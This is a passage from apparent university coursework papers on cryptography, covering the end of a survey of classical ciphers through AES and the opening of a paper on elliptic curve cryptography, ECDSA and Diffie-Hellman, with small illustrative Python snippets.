of bits as the original plaintext block. The AES utilizes keys of 128, 192 or 256 bits to
encrypt and decrypt data in blocks of 128 bits. [13] It also uses a loop structure to
conduct permutation and substitution on the input plaintext repeatedly. There is no
Feistel structure within AES; instead, it utilizes a substitution-permutation network.
In 2001, the AES algorithm was introduced by the National Institute of Standards
and Technology to protect the confidentiality of sensitive information. The AES was
initially named Rijndael and was originally invented by two Belgian cryptographers,
Joan Daemen and Vincent Rijmen.
Due to the extremely short key in DES, many malicious attacks via sophisticated
hardware and software have effectively decrypted data encrypted by the DES system.
Since DES no longer provides adequate security, the AES was approved by the
Secretary of Commerce in 2002 to replace DES as a Federal Standard.
Common usages pertaining to the AES include file encryption on hard disk or
thumb drive and encryption of electronic mail messages.
As seen in Figure 7 (refer to Appendix A), within the AES algorithm, round keys are
derived from the cipher key during key expansion, based on Rijndael's key schedule.
In the initial round, each byte of the state undergoes a bitwise XOR with the round
key.
In the subsequent nine rounds, during the SubBytes step, each byte within the
matrix is updated in accordance with the 8-bit Rijndael substitution box lookup table.
This step provides non-linearity in the cipher via a multiplicative inverse over a finite
field. In the ShiftRows step, the first row remains as it is; each byte of the second row
is shifted one position to the left, the third row is shifted two positions to the left, and
so on. In the MixColumns step, the four bytes belonging to each column of the state
are combined via an invertible linear transformation: the function operates on a
four-byte input and produces a four-byte output, with each column multiplied by a
fixed matrix. In the AddRoundKey step, upon deriving the sub-key from the main key
via Rijndael's key schedule, each byte of the sub-key is combined with the
corresponding byte of the state in a bitwise XOR operation.
In the final round, all of the above steps are repeated except the MixColumns step,
before the encrypted output is obtained.
In order to obtain the plaintext input from the encrypted output, the above rounds are
carried out in reverse with the use of the same encryption key.
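Of the four round steps, ShiftRows is the easiest to sketch in code. The following toy illustration operates on a 4x4 state of byte values, rotating row r left by r positions:

```python
# ShiftRows on a 4x4 AES state sketch: state[r][c] holds row r, column c;
# row r is rotated left by r positions.
def shift_rows(state):
    return [row[r:] + row[:r] for r, row in enumerate(state)]

state = [
    [ 0,  1,  2,  3],
    [ 4,  5,  6,  7],
    [ 8,  9, 10, 11],
    [12, 13, 14, 15],
]
shifted = shift_rows(state)
assert shifted[0] == [0, 1, 2, 3]      # first row unchanged
assert shifted[1] == [5, 6, 7, 4]      # shifted one position left
assert shifted[2] == [10, 11, 8, 9]    # shifted two positions left
assert shifted[3] == [15, 12, 13, 14]  # shifted three positions left
```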
In 2009, attacks against the AES cryptosystem were published. However, the
National Security Agency stated that the AES was still capable of securing
non-classified data belonging to the US government. This is mainly because the
published attacks are theoretical related-key attacks, in which the adversary needs
access to plaintexts encrypted under multiple related keys. In addition, AES-256 has
14 rounds, and the published attack broke only 11 of them. At this current moment,
the theoretical attack remains computationally infeasible.
6 Conclusion
Since ancient times, people have been inventing cryptographic systems to conceal
messages used for communication from unintended recipients. Having studied the
various cryptographic systems above, we have learnt that most cryptographic systems
have their limitations. Even with such limitations, cryptography has been widely
adopted, from military usage in the ancient era to commercial purposes in today's
context. As newer and more sophisticated cryptographic techniques are developed,
cracking a cipher becomes ever more difficult; people are thus able to further ensure
message confidentiality while also becoming more competent at deterring malicious
attacks by third-party adversaries.
7 References (Refer to Appendix B for more references)
1. Logical Security, http://www.logicalsecurity.com/resources/whitepapers/Cryptography.pdf
2. Redline, http://www.freewebs.com/atbash_cipher/atbshhistory.htm
3. Redline, http://redline.webamphibian.com/crypt/jefferson.asp
4. Cipher Machines, http://ciphermachines.com/ciphermachines/jefferson.html
5. Britannica Encyclopedia, http://www.britannica.com/EBchecked/topic/628637/Vigenère-cipher
6. Jeremy Norman’s From Cave Painting to the Internet, http://www.historyofinformation.com/index.php?id=2011
7. Vanderbilt University, http://blogs.vanderbilt.edu/mlascrypto/blog/wp-content/uploads/project-playfair-cipher.pdf
8. Shifted Bits Blog, http://www.shiftedbits.net/code/the-adfgvx-cipher/
9. Cipher Machines & Cryptography, http://users.telenet.be/d.rijmenants/en/onetimepad.htm
10. Next Wave Software, http://www.thenextwave.com/page19.html
11. Linux FreeS/WAN, http://www.freeswan.org/freeswan_trees/freeswan-1.5/doc/DES.html
12. EKU, http://people.eku.edu/styere/Encrypt/RSAdemo.html
13. Federal Information Processing Standards Publication 197, http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
14. MSDN Magazine, http://msdn.microsoft.com/en-us/magazine/cc164055.aspx
15. Business Security, http://bizsecurity.about.com/od/informationsecurity/a/aes_history.htm
16. Schneier on Security, http://www.schneier.com/blog/archives/2009/07/another_new_aes.html
Appendix A
Tables
Table 1. Atbash Cipher of the Roman alphabet
Plaintext:   A B C D E F G H I J
Cipher-text: Z Y X W V U T S R Q
Table 2. Caesar cipher of the Roman alphabet, shift of 3
Plaintext:   A B C D E F G H I J
Cipher-text: D E F G H I J K L M
Table 3. Vigenere cipher example
Plaintext: H E L L O
Key:       H E Y H E
Cipher:    O I J S S
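The Vigenere example in Table 3 can be checked with a short script, numbering the letters A = 0 through Z = 25 and adding plaintext and key letters modulo 26:

```python
# Checking Table 3: each cipher letter is plaintext + key modulo 26,
# with letters numbered A = 0 ... Z = 25.
def vigenere(plaintext, key):
    return ''.join(
        chr((ord(p) - 65 + ord(k) - 65) % 26 + 65)
        for p, k in zip(plaintext, key * len(plaintext))
    )

assert vigenere("HELLO", "HEY") == "OIJSS"
```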
Table 4. Playfair cipher digraph example
HI DE TH EG OL DS
Table 5. Rules of a One Time Pad (http://users.telenet.be/d.rijmenants/en/onetimepad.htm)
1. The length of the key is equal to the length of the message to be encrypted.
2. The key is random.
3. Both the key and plaintext are calculated modulo 10 (digits), modulo 26 (letters) or modulo 2 (binary).
4. Each key may only be used once. After each use, both the sender and recipient must destroy their key.
5. There should only be one copy of the key each for the sender and recipient.
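The modular arithmetic in rule 3 can be sketched for the letters case as follows. Note that random.choice is only a stand-in here; a real one-time pad requires a truly random key source:

```python
import random

# One-time pad over letters, calculated modulo 26 (rule 3).
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def otp_encrypt(plaintext, key):
    assert len(key) == len(plaintext)   # rule 1
    return ''.join(chr((ord(p) + ord(k) - 130) % 26 + 65)
                   for p, k in zip(plaintext, key))

def otp_decrypt(ciphertext, key):
    return ''.join(chr((ord(c) - ord(k)) % 26 + 65)
                   for c, k in zip(ciphertext, key))

message = "ATTACKATDAWN"
# rule 2: the key is random (random.choice is only a stand-in; a real
# pad needs a truly random source)
key = ''.join(random.choice(ALPHABET) for _ in message)
assert otp_decrypt(otp_encrypt(message, key), key) == message
```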
Figures
Fig 1. Vigenere Table
Fig 2. Playfair cipher key table
Fig 3. ADFGVX cipher key
Fig 4. ADFGVX cipher-text
Fig 5. ADFGVX resultant cipher-text
Fig 6. DES block diagram
Fig 7. Summary of AES Encryption
Formulas
X = (P-1)(Q-1)  (1)
N = P*Q  (2)
C = m^E mod N  (3)
D*E mod X = 1  (4)
m = C^D mod N  (5)
C^D mod N = m^(E*D) mod N  (6)
Appendix B
References
1. Student Pulse, http://www.studentpulse.com/articles/41/a-brief-history-of-cryptography
2. Gary Kessler Associates, http://www.garykessler.net/library/crypto.html
3. Cornell Mathematics, http://www.math.cornell.edu/~kozdron/Teaching/Cornell/135Summer06/Handouts/Lecture2.pdf
4. Oracle Thinkquest: Library, http://library.thinkquest.org/28005/flashed/timemachine/courseofhistory/jefferson.shtml
5. Crypto Museum, http://www.cryptomuseum.com/crypto/usa/jefferson/index.htm#ref
6. Discovering Lewis & Clark, http://lewis-clark.org/content/content-article.asp?ArticleID=2224
7. Rumkin.com, http://rumkin.com/tools/cipher/playfair.php
8. Practical Cryptography, http://practicalcryptography.com/ciphers/playfair-cipher/
9. Practical Cryptography, http://practicalcryptography.com/ciphers/adfgvx-cipher/
10. RuffNekk’s Crypto Pages, http://ruffnekk.stormloader.com/adfgvx_info.html
11. University of Cambridge, http://www.srcf.ucam.org/~bgr25/cipher/adfgvx.php
12. Marcus J. Ranum, http://www.ranum.com/security/computer_security/papers/otp-faq/
13. Universiteit van Amsterdam, http://www.maurits.vdschee.nl/otp/
14. Books by William Stallings, http://williamstallings.com/Extras/SecurityNotes/lectures/blockA.html
15. University of Wisconsin Madison, http://pages.cs.wisc.edu/~rist/papers/detenc-rel.pdf
16. Applied Crypto Group, http://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf
17. RSA Encryption – Tom Davis, http://www.geometer.org/mathcircles/RSA.pdf
18. RSA Public-Key Cryptography, http://www.efgh.com/software/rsa.htm
19. Schneier on Security, http://www.schneier.com/blog/archives/2009/07/new_attack_on_a.html
Elliptic Curve Cryptography
Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan
National University of Singapore (NUS), School of Computing,
CS3235: Computer Security
Abstract. This paper gives an overview of Elliptic Curve Cryptography (ECC) and
how it is used to implement digital signatures using the Elliptic Curve Digital
Signature Algorithm (ECDSA) and key agreement protocols using Elliptic Curve
Diffie-Hellman (ECDH). There is a discussion of the mathematical components of an
elliptic curve function and the underlying theories of ECC. The paper also gives a
general description of the security issues of ECC as well as some ECC
implementation examples.
1 Introduction
Elliptic Curve Cryptography (ECC) is a public key cryptography method based on
elliptic curves over a finite field. There are two main uses of public key cryptography:
public key encryption and digital signatures. Public key encryption involves sending a
message encrypted with the recipient's public key, which can only be decrypted with
the recipient's private key, thereby providing confidentiality. A digital signature, on
the other hand, is used to prove the authenticity of the sender: a message encrypted
with the sender's private key is sent to the recipient, who decrypts the message with
the sender's matching public key to prove that the sender had access to the associated
private key.
Such public key cryptography is assumed to be secure due to the difficulty of
factoring a large integer made up of two large prime factors; the larger the key
length, the more secure it is. ECC is able to provide a similar level and type of
security with much smaller key lengths due to the difficulty of solving the elliptic
curve discrete logarithm problem: finding the scalar k such that Q = kP, where P and
Q are points on an elliptic curve E defined over a finite field. Hence, with short key
lengths, handshaking protocols between sender and recipient where public key
cryptography is implemented will be faster.
2 Mathematical Knowledge for ECC
2.1 Elliptic Curve Function
Elliptic curves are cubic curves. An elliptic curve E over a field F can be described by
the equation y^2 = x^3 + ax + b, where a, b ∈ F. Elliptic curve cryptography is
defined over the elliptic curve y^2 = x^3 + ax + b, where the discriminant of the
equation, 4a^3 + 27b^2, must not be equal to 0. This condition must be satisfied so
that the elliptic curve possesses 3 distinct roots. If the discriminant equals 0, two or
more roots coalesce, producing curves that are singular. Singular curves are not
desirable for cryptography because they are easy to crack. Another characteristic of
the elliptic curve is that the curve is symmetric about the x-axis, which can be
observed by rewriting the equation as y = ±sqrt(x^3 + ax + b).
Each pair of values a and b gives a different elliptic curve, and all points (x, y)
satisfying the equation lie on the curve, together with a point at infinity. For instance,
implementing public key cryptography with ECC results in a public key that is a
point on the curve and a private key that is a randomly generated number. The public
key can be obtained by multiplying the private key with a generator point G on the
curve. This generator G, the values a and b, the field F, and other constants form the
domain parameters of ECC, which will be further elaborated under 'Elliptic Curve
Domain Parameters for different finite fields' in this paper.
2.2 Point Addition
Before going into point multiplication which is necessary for generating the keys,
point addition is required, as it is part of point multiplication. Point addition is
basically the adding of two points J and K on an elliptic curve so as to obtain another
point L on the same elliptic curve.
Fig. 1. The graph above demonstrates a line intersecting J, K and –L if J ≠ K for point addition.
The elliptic curve has 2 properties, and the first is if a line intersects 2 points, it will
intersect a 3rd point. Fig. 1 above shows that if J ≠ K and a line is drawn through both
of the points J and K, it will intersect the point –L on the same elliptic curve. After
that, reflect –L with respect to the x-axis in order to get L. This gives the equation of
L = J + K on an elliptic curve.
Fig. 2. The graph above demonstrates a line intersecting J, K and ∞ if J = -K for point addition
and if the line is a vertical line.
If J = -K, the line that intersects both J and K is vertical and intersects the curve at the
point at infinity, since all vertical lines intersect the curve at that point. Therefore,
J + (-J) = O, where O (also written ∞) is the point at infinity, as shown in Fig. 2. O is
the additive identity of the elliptic curve group.
To find the point L, we first have to find the line intersecting J, K and -L. Let J =
(xJ, yJ), K = (xK, yK) and L = (xL, yL).
Let the slope of the line be s, given by s = (yJ - yK) / (xJ - xK).
To find xL and yL, the following equations can be used:
1. xL = s^2 - xJ - xK
2. yL = -yJ + s(xJ - xL)
However, if J = -K, i.e. K = (xJ, -yJ), then J + K = O, where O is the point at infinity.
The second property is if a line is tangent to the elliptic curve, it will intersect another
point on the same elliptic curve. This will be further elaborated at the next section.
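The addition formulas above can be checked numerically over the real numbers. The curve parameters a = -2, b = 4 and the points below are illustrative choices; the final assertion verifies that the computed point L lies back on the curve:

```python
# Numerical check of the point addition formulas over the reals on the
# illustrative curve y^2 = x^3 - 2x + 4 (a = -2, b = 4).
a, b = -2.0, 4.0

def on_curve(x, y, eps=1e-9):
    return abs(y * y - (x ** 3 + a * x + b)) < eps

def add(J, K):
    (xJ, yJ), (xK, yK) = J, K
    s = (yJ - yK) / (xJ - xK)      # slope of the line through J and K
    xL = s * s - xJ - xK
    yL = -yJ + s * (xJ - xL)       # reflect the third intersection point
    return (xL, yL)

J = (0.0, 2.0)           # 2^2 = 0 - 0 + 4
K = (2.0, 8.0 ** 0.5)    # y = sqrt(2^3 - 4 + 4) = sqrt(8)
L = add(J, K)
assert on_curve(*J) and on_curve(*K) and on_curve(*L)
```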
2.3 Point Doubling on real numbers, Prime field, Binary field and also
in Projective Coordinate System
Fig. 3. The graph above demonstrates a line tangent at the point J and intersecting -L if J = K
for point doubling
The second property is if a line is tangent to the elliptic curve, it will intersect another
point on the same elliptic curve. Fig. 3 above shows that if J = K and a line is drawn
tangent to the point J, it will intersect the point –L on the same elliptic curve.
Similarly, reflect –L with respect to the x-axis in order to get L. This will give the
equation of L = 2J on an elliptic curve.
Fig. 4. The graph above demonstrates a line tangent at the point J and intersecting -∞ if yJ = 0
for point doubling and if the line is a vertical line
However, if the y-coordinate of point J is zero, then the tangent at this point is
vertical and intersects the curve at ∞. This results in 2J = ∞ whenever the
y-coordinate of point J is zero.
To find the point L, we first have to find the line tangent to the curve at J and
intersecting -L. Let J = (xJ, yJ) and L = (xL, yL).
Let s be the slope of the tangent at the point J and a be one of the parameters chosen
with the elliptic curve. The slope is given by s = (3xJ^2 + a) / (2yJ).
To find xL and yL, the following equations can be used:
1. xL = s^2 - 2xJ
2. yL = -yJ + s(xJ - xL)
Both point addition and point doubling are necessary operations for point
multiplication.
Although the graph of an elliptic curve over a prime field is not a smooth curve but a
set of discrete points, the rules for point doubling can still be adapted to it. As the
elements of the prime field are integers between 0 and P - 1, the equation of the
elliptic curve over a prime field will be y^2 mod P = (x^3 + ax + b) mod P, where
(4a^3 + 27b^2) mod P ≠ 0. In
elliptic curve cryptography, the prime number P will be chosen in such a way that
there will be many points on the elliptic curve in order to make the encryption
stronger.
Since the rules for point doubling can be adapted to elliptic curve on a Prime field, the
equations will be the following:
1. S = (3xJ^2 + a) / (2yJ) mod P
2. xL = S^2 - 2xJ mod P
3. yL = -yJ + S(xJ - xL) mod P
Similarly for the binary field, despite having a different equation and elements, the
rules for point doubling can be adapted to the elliptic curve over a binary field. The
equation of the elliptic curve over a binary field is as follows: y^2 + xy = x^3 +
ax^2 + b, where b ≠ 0.
Since the rules for point doubling can be adapted to elliptic curve on a Binary field,
the equations will be the following:
1. S = xJ + (yJ / xJ)
2. xL = S^2 + S + a
3. yL = xJ^2 + xL(S + 1)
In the projective coordinate system, the multiplicative inverse operations needed for
point addition and doubling can be eliminated. This improves the efficiency of point
multiplication: a given point is converted from affine to projective coordinates, all
point operations are performed there, and the result is converted back to affine
coordinates, so only one multiplicative inverse operation is required in total.
Operations in projective coordinates involve more scalar multiplications than in
affine coordinates, however, so ECC in projective coordinates is only more efficient
when a multiplicative inverse operation is slower than the extra scalar
multiplications.
Despite the elliptic curve having a different equation in projective coordinates, the
point doubling formula L = 2J is still analogous to doubling a point in affine
coordinates. As a note, the point (X, Y, Z) in projective coordinates corresponds to
the point (X/Z, Y/Z^2) in affine coordinates. The equation of the elliptic curve in
projective coordinates is Y^2 + XYZ = X^3 Z + aX^2 Z^2 + bZ^4.
Let (X3, Y3, Z3) = 2(X1, Y1, Z1):
1. Z3 = X1^2 * Z1^2
2. X3 = X1^4 + b*Z1^4
3. Y3 = b*Z1^4 * Z3 + X3 * (a*Z3 + Y1^2 + b*Z1^4)
2.4 Point Multiplication
The main cryptographic operation in ECC is point multiplication which computes Q =
kP as mentioned earlier. The point P which is on the elliptic curve is multiplied by an
integer k resulting in another point Q on the same curve. Point multiplication can be
done by a combination of the two basic elliptic curve operations: point addition and
point doubling which were explained on earlier sections.
Point multiplication can be performed using on the order of log2(k) point doublings
and additions. For example, if k = 11, then 11P = 2(2(2P) + P) + P. If k = 23, then
23P = 2(2(2(2P) + P) + P) + P. This double-and-add approach is the easiest method
of performing point multiplication; there are other methods, such as the windowed
method, the sliding window method and the wNAF method, for computing point
multiplication.
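Double-and-add can be sketched on a small illustrative curve, y^2 = x^3 + 2x + 2 over F_17 with generator G = (5, 1), whose point group has order 19 (real curves use primes of 160 bits or more; pow(x, -1, p) requires Python 3.8+):

```python
# Double-and-add point multiplication on the small illustrative curve
# y^2 = x^3 + 2x + 2 over F_17. The point at infinity O is represented
# as None.
p, a = 17, 2

def add(J, K):
    # Point addition/doubling over F_p, following the formulas above
    if J is None: return K
    if K is None: return J
    (xJ, yJ), (xK, yK) = J, K
    if xJ == xK and (yJ + yK) % p == 0:
        return None                                     # J + (-J) = O
    if J == K:
        s = (3 * xJ * xJ + a) * pow(2 * yJ, -1, p) % p  # tangent slope
    else:
        s = (yJ - yK) * pow(xJ - xK, -1, p) % p         # chord slope
    xL = (s * s - xJ - xK) % p
    return (xL, (-yJ + s * (xJ - xL)) % p)

def mul(k, P):
    # Scan the bits of k from most significant to least: double, then add
    Q = None
    for bit in bin(k)[2:]:
        Q = add(Q, Q)
        if bit == '1':
            Q = add(Q, P)
    return Q

G = (5, 1)                  # a generator; its order on this curve is 19
assert mul(2, G) == (6, 3)  # one point doubling
assert mul(19, G) is None   # 19G = O, the point at infinity
```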
3 Underlying Theory of ECC
3.1 Public key and private key
Assume P and Q are two points on an elliptic curve such that Q = kP, where k is a
scalar. Given only P and Q, it is very hard to compute k, which is not only the
discrete logarithm of Q to the base P but also serves as the private key, selected
randomly by the user.
Basically, to generate both the public key and the private key, the user selects a
random integer k as the private key and computes kP, which serves as the
corresponding public key.
3.2 Discrete Logarithm Problem
The discrete logarithm problem is described as the problem of finding x in the
equation g^x = h, where the elements g and h belong to a finite cyclic group G.
Equivalently, it is the problem of computing x = log_g h given g and h.
It is similar to the factoring problem: as the group order becomes very large, the
computation becomes very slow, which leads to the belief that the discrete logarithm
problem is very difficult. ECC is one of the cryptographic systems that rely on the
difficulty of the discrete logarithm problem. Other such cryptographic systems
include Diffie-Hellman key agreement and the Digital Signature Algorithm.
3.3 Elliptic Curve Domain Parameters for different finite fields
In order to use ECC, all parties involved in the secured and trusted communication
using ECC must agree on the elements and parameters which are called domain
parameters that define the elliptic curve. Apart from the parameters a and b, other
domain parameters for Prime field and Binary field must also be agreed. They will be
described further later. The generation of domain parameters is not done by the
parties involved since it involves counting the number of points on the elliptic curve.
This will take up a lot of time and effort; hence there are several standard bodies such
as NIST and SECG who published domain parameters of elliptic curves for some
common field sizes.
3.3.1 Domain parameters for Elliptic Curve over Prime field
For the elliptic curve over a prime field, the domain parameters are p, G, n and h, as
well as the parameters a and b defined in the elliptic curve function y^2 mod p =
(x^3 + ax + b) mod p. Here p represents the prime number defined for the prime field.
- G is the generator point, with coordinates (xG, yG), a point on the elliptic curve chosen for the cryptosystem.
- n is the order of the generator point G.
- h = (number of points on the elliptic curve)/n, which is the cofactor.
- The scalar for point multiplication is chosen as a number between 0 and n-1.
3.3.2 Domain parameters for Elliptic Curve over Binary field
For the elliptic curve over a binary field, the domain parameters are m and f(x), as
well as the domain parameters G, n, h, a and b defined for the elliptic curve over a
prime field above.
- m is an integer defined for the binary field, where the length of the elements of the binary field is at most m bits.
- f(x) is an irreducible polynomial of degree m.
- The scalar for point multiplication is chosen as a number between 0 and n-1.
4 Advantage over current schemes / Motivation
4.1 Small key size
Comparing Integer Factorization (RSA) against the Elliptic Curve Discrete
Logarithm (ECDSA), an attacker faces a different mathematical problem in each
case, with different methods for solving it. The mathematical problem of Integer
Factorization is to find the prime factors of a number n, whereas the mathematical
problem of the Elliptic Curve Discrete Logarithm is to find k in the equation Q = kP,
with points Q and P on an elliptic curve.
The most efficient known method for Integer Factorization is the Number Field
Sieve, with running time exp[1.923 (log n)^(1/3) (log log n)^(2/3)] (sub-exponential),
while the most efficient known way to solve the Elliptic Curve Discrete Logarithm is
Pollard's rho algorithm, with running time sqrt(n) (fully exponential). Since Pollard's
rho algorithm scales worse than the Number Field Sieve, ECC can offer the same
security as Integer Factorization with much smaller keys. This allows a 160-bit ECC
key to provide security comparable to a 1024-bit RSA key.
The smaller key size allows for faster computations, less bandwidth and memory
usage, and lower power consumption. So not only do small embedded devices benefit
from using ECC; web servers can also lower their computation and resource usage by
using ECC.
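The comparison above can be made concrete with a rough back-of-the-envelope calculation; the constants follow the Number Field Sieve formula quoted above, and the outputs are approximate attack costs expressed in bits:

```python
import math

# Approximate attack costs, in bits (log2 of the operation count).
def nfs_cost_bits(modulus_bits):
    # Number Field Sieve: exp[1.923 (ln n)^(1/3) (ln ln n)^(2/3)]
    ln_n = modulus_bits * math.log(2)
    return 1.923 * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3) / math.log(2)

def rho_cost_bits(group_bits):
    # Pollard's rho: sqrt(2^k) = 2^(k/2) operations
    return group_bits / 2

rsa_1024 = nfs_cost_bits(1024)   # roughly 2^87 operations
ecc_160 = rho_cost_bits(160)     # 2^80 operations
assert abs(rsa_1024 - ecc_160) < 10   # comparable security levels
```

These are crude estimates that ignore constant factors and memory costs, but they illustrate why a 160-bit elliptic curve key is usually paired with a 1024-bit RSA modulus in security tables.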
5 Practical use of ECC
5.1 ECDSA - Elliptic Curve Digital Signature Algorithm and explanation
5.1.1 Digital Signature and DSA
A digital signature algorithm is used for ensuring the authenticity of a message sent
from the sender to the receiver. For instance, Alice and Bob are the two parties
involved in the transmission. Both Alice and Bob will have their own public key and
private key, as well as each other's public key. If Alice sends a message to Bob
encrypted using Bob's public key, only Bob will be able to decrypt the message using
his private key, which is known only to him. Bob will then digitally sign his reply
to Alice by hashing the reply to create a message digest. The message digest
ensures that any changes made to the signed message will not go undetected. Bob
will then encrypt the message digest with his private key to create his digital
signature.
DSA has three phases; key generation, signature generation and signature verification.
DSA Key Generation
The key generation algorithm selects a random integer x where 0 < x < q. The private
key is x and the public key is y = g^x mod p, within the domain parameters (p, q, g).
DSA Signature Generation
Let H be the hashing function (e.g. SHA-1) and m the message:
1) Select a random integer k where 0 < k < q
2) Compute r = (g^k mod p) mod q
3) Calculate s = [k^(-1) (H(m) + x.r)] mod q
The digital signature (e.g. Bob's) will be (r, s). Bob can now append his digital
signature to the message he wants to send back to Alice.
DSA Signature Verification
To verify Bob's signature (r, s) on m, Alice obtains authentic copies of Bob's domain
parameters (p, q, g) and public key y, and does the following:
1) Reject the signature if 0 < r < q or 0 < s < q is not satisfied
2) Calculate w = s^(-1) mod q
3) Calculate u1 = H(m).w mod q
4) Calculate u2 = r.w mod q
5) Calculate v = ((g^u1 . y^u2) mod p) mod q
Alice will be able to verify the digital signature with Bob‟s public key known. The
signature is valid if v = r.
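The DSA equations above can be exercised with tiny hypothetical parameters (p, q, g) = (23, 11, 4); real DSA uses a 1024-bit p, a 160-bit q and a real hash H(m) in place of the integer h below:

```python
# Toy DSA with tiny hypothetical parameters. q divides p - 1 = 22, and
# g = 2^((p-1)/q) mod p = 4 has order q. Real DSA uses a 1024-bit p,
# a 160-bit q, and a hash H(m) in place of the integer h.
p, q, g = 23, 11, 4

x = 7              # private key, 0 < x < q
y = pow(g, x, p)   # public key: y = g^x mod p

def sign(h, k):
    # k must be a fresh random secret for every signature
    r = pow(g, k, p) % q
    s = pow(k, -1, q) * (h + x * r) % q
    return r, s

def verify(h, r, s):
    w = pow(s, -1, q)
    u1 = h * w % q
    u2 = r * w % q
    v = (pow(g, u1, p) * pow(y, u2, p) % p) % q
    return v == r

r, s = sign(3, k=4)
assert verify(3, r, s)       # the genuine digest verifies
assert not verify(4, r, s)   # a different digest fails
```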
5.1.2 Elliptic Curve Digital Signature and ECDSA
The Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the
above-mentioned DSA that uses elliptic curve cryptography. Essentially, ECDSA can
be viewed as the elliptic curve version of the older discrete logarithm cryptosystems,
whereby the prime-order multiplicative group of integers modulo a prime is replaced
by the group of points on an elliptic curve over a finite field.
The bit size of an ECDSA public key is about twice the security level in bits. An
ECDSA public key needs only 160 bits to provide the same security level as a DSA
public key of at least 1024 bits. In addition, the DSA and ECDSA signature sizes are
the same for the same security level.
Like DSA, ECDSA has three phases: key generation, signature generation and
signature verification.
ECDSA Key Generation
Assuming Alice wants to send a message m to Bob, each will have a pair of keys
associated with a particular set of EC domain parameters, D = (q, FR, a, b, G, n, h).
There is an elliptic curve E defined over Fq, where q is a prime, and P is a point of
prime order n on the elliptic curve E(Fq). To generate the keys, Alice and Bob will
each have to:
1) Select a random integer d where 0 < d < n
2) Compute Q = d.P (Scalar Multiplication)
3) The public key will be Q and the private key will be d.
ECDSA Signature Generation:
Now that both Alice and Bob have a key pair suitable for elliptic curve cryptography,
private key d and public key Q within domain parameters D = (q, FR, a, b, G, n, h),
each of them can create their signature by doing the following:
1) Select a random integer k, where 0 < k < n
2) Compute kP = (x1, y1) and r = x1 mod n, where x1 is an integer between 0
and q-1
3) Compute k^-1 mod n
4) Compute s = [k^-1 . (H(m) + d.r)] mod n
Alice's signature for message m is the pair of integers (r, s).
ECDSA Signature Verification:
In order for Bob to verify Alice's signature (r, s) appended to the message m, Bob
obtains an authentic copy of Alice's domain parameters D = (q, FR, a, b, G, n, h) and
public key Q and does the following:
1) Reject the signature if r and s are not integers in the interval [1, n-1]
2) Compute w = s^-1 mod n, and H(m)
3) Compute u1 = H(m).w mod n
4) Compute u2 = r.w mod n
5) Compute u1.P + u2.Q = (x0, y0) and v = x0 mod n
Bob accepts the signature if v = r, which verifies that the message was sent by Alice.
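The full ECDSA flow can be sketched over a textbook-sized curve. We assume here, purely for illustration, the toy curve y^2 = x^3 + 2x + 2 over F_17, whose generator G = (5, 1) has prime order n = 19 (real ECDSA uses curves with an n of roughly 160 bits or more):

```python
import hashlib
import random

# Toy curve y^2 = x^3 + 2x + 2 over F_17; G generates a group of order 19.
P_MOD, A = 17, 2
G, N = (5, 1), 19

def ec_add(P, Q):
    # Group law on the curve; None represents the point at infinity.
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P_MOD) % P_MOD
    x3 = (lam * lam - x1 - x2) % P_MOD
    return (x3, (lam * (x1 - x3) - y1) % P_MOD)

def ec_mul(k, P):
    # Scalar multiplication k.P by double-and-add.
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

def H(m):
    # Hash reduced mod n; SHA-1 stands in for the hash in the text.
    return int.from_bytes(hashlib.sha1(m).digest(), "big") % N

def keygen():
    d = random.randrange(1, N)          # private key
    return d, ec_mul(d, G)              # public key Q = d.P

def sign(m, d):
    while True:
        k = random.randrange(1, N)
        x1, _ = ec_mul(k, G)
        r = x1 % N
        if r == 0:
            continue
        s = pow(k, -1, N) * (H(m) + d * r) % N
        if s:
            return r, s

def verify(m, r, s, Q):
    if not (1 <= r <= N - 1 and 1 <= s <= N - 1):
        return False
    w = pow(s, -1, N)
    u1, u2 = H(m) * w % N, r * w % N
    X = ec_add(ec_mul(u1, G), ec_mul(u2, Q))
    return X is not None and X[0] % N == r

d, Q = keygen()
r, s = sign(b"message m", d)
print(verify(b"message m", r, s, Q))    # True
```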
5.2 ECDH - Elliptic Curve Diffie-Hellman and explanation
5.2.1 Diffie-Hellman Key Agreement
Diffie-Hellman (DH) is a key agreement protocol, whereby two entities with no prior
knowledge of each other create a shared secret key together, over an insecure
communication channel. This shared secret key can then be used to encrypt
subsequent communications.
For Alice and Bob to create a shared secret key, both parties need to first agree on a
prime P and a generator G, where P > G and G is a primitive root of P. To share a
secret key, Alice and Bob need to do the following:
1) Generate random numbers XA (Alice's private key) and XB (Bob's private key)
2) Alice computes YA = G^XA mod p and sends it to Bob
3) Bob computes YB = G^XB mod p and sends it to Alice
4) Alice now computes the secret key = (YB)^XA mod p
5) Bob now computes the secret key = (YA)^XB mod p
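The five steps above can be sketched directly. The toy values p = 23 and G = 5 (a primitive root mod 23) are assumed for illustration only:

```python
import random

# Toy Diffie-Hellman parameters; real DH uses primes of 2048 bits or more.
p, G = 23, 5                       # G is a primitive root mod p

xa = random.randrange(1, p - 1)    # Alice's private key XA
xb = random.randrange(1, p - 1)    # Bob's private key XB

ya = pow(G, xa, p)                 # Alice sends YA = G^XA mod p
yb = pow(G, xb, p)                 # Bob sends YB = G^XB mod p

k_alice = pow(yb, xa, p)           # Alice: (YB)^XA mod p
k_bob = pow(ya, xb, p)             # Bob:   (YA)^XB mod p
print(k_alice == k_bob)            # True: both equal G^(XA.XB) mod p
```

An eavesdropper sees only p, G, YA and YB; recovering XA or XB from them is the discrete logarithm problem.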
5.2.2 Elliptic Curve Diffie-Hellman, ECDH
Elliptic Curve Diffie-Hellman is a variant of the Diffie-Hellman key agreement
protocol which likewise allows two entities to establish a shared secret key. Similarly,
any third party who does not have access to the private keys of the two entities will
not be able to calculate the shared secret key, even if he/she snoops on the conversation.
The shared secret key generation between the two entities using ECDH requires the
agreement on elliptic curve domain parameters (defined in Elliptic Curve Domain
